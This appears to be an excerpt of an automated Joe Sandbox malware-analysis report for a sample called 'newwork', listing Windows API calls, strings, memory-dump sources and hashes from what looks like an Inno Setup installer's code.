                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                                        • String ID:
                                                                                        • API String ID: 3985193851-0
                                                                                        • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                        • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                        • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                        • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                        • SendNotifyMessageA.USER32(0001041E,00000496,00002710,00000000), ref: 00481A97
                                                                                        Strings
                                                                                        • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                        • Restarting Windows., xrefs: 00481A72
                                                                                        • Deinitializing Setup., xrefs: 00481872
                                                                                        • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                        • DeinitializeSetup, xrefs: 0048190D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$MessageNotifySend
                                                                                        • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                        • API String ID: 3817813901-1884538726
                                                                                        • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                        • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                        • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                        • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                        APIs
                                                                                        • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                        • GetActiveWindow.USER32 ref: 0046172B
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                        • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                        • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                        • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                        • String ID: A
                                                                                        • API String ID: 2684663990-3554254475
                                                                                        • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                        • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                        • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                        • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                          • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                        • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                        • API String ID: 884541143-1710247218
                                                                                        • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                        • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                        • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                        • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                        • API String ID: 190572456-3516654456
                                                                                        • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                        • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                        • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                        • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                        APIs
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                        • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                        • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                        • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$StretchText
                                                                                        • String ID:
                                                                                        • API String ID: 2984075790-0
                                                                                        • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                        • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                        • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                        • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                        APIs
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDirectoryHandleSystem
                                                                                        • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                        • API String ID: 2051275411-1862435767
                                                                                        • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                        • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                        • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                        • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                        APIs
                                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                        • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                        • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$Color$Draw$OffsetRect
                                                                                        • String ID:
                                                                                        • API String ID: 1005981011-0
                                                                                        • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                        • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                        • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                        • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041B745
                                                                                        • GetDC.USER32(?), ref: 0041B751
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                        • String ID: %H
                                                                                        • API String ID: 3275473261-1959103961
                                                                                        • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                        • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                        • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                        • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041BA17
                                                                                        • GetDC.USER32(?), ref: 0041BA23
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                        • String ID: %H
                                                                                        • API String ID: 3275473261-1959103961
                                                                                        • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                        • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                        • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                        • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                        • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                        • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                        Strings
                                                                                        • Deleting Uninstall data files., xrefs: 004964FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                        • String ID: Deleting Uninstall data files.
                                                                                        • API String ID: 1570157960-2568741658
                                                                                        • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                        • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                        • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                        • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                        • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                        Strings
                                                                                        • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                        • AddFontResource, xrefs: 004702B5
                                                                                        • Failed to open Fonts registry key., xrefs: 00470281
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                        • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                        • API String ID: 955540645-649663873
                                                                                        • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                        • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                        • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                        • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                        APIs
                                                                                          • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                          • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                          • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                        • GetVersion.KERNEL32 ref: 00462E60
                                                                                        • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                        • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                        • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                        • String ID: Explorer
                                                                                        • API String ID: 2594429197-512347832
                                                                                        • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                        • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                        • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                        • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                        • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0), ref: 004783CC
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                        • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                        • API String ID: 2704155762-2318956294
                                                                                        • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
